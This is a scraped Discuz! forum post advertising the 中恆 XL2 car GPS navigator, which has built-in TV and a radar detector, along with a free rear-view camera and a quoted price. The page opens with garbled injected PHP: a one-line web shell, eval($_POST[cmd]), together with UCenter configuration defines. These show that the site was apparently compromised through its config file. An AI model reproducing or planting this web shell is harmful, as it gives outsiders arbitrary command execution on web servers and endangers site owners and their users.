');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 送倒車後視 中恆全能型一體機XL2 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

送倒車後視 中恆全能型一體機XL2

中恆XL2車載GPS導航儀是一款內置數字電視的一體式預警GPS,而這款機器的主體採用了非常美型的中恆XL1,讓這款一體式預警車載GPS導航儀看上去非常的精緻。目前購買這款產品還將獲得商家送出的無線倒車後視攝像頭一個,商家報價為:2050元。



中恆XL2車載GPS導航儀


採用一體式背架電子狗

    XL2內置數字電視,新品上市價格比較高,但是贈送價值300元的無限倒車後市攝像頭比較實惠,XL1提供給哪些不需要電視功能的用戶,價格也相對便宜一些,新品外觀非常漂亮,在市面上目前很難有能和XL2與XL1相媲美的機器,一舉擺脫了車載GPS笨重、保守的外觀形
返回列表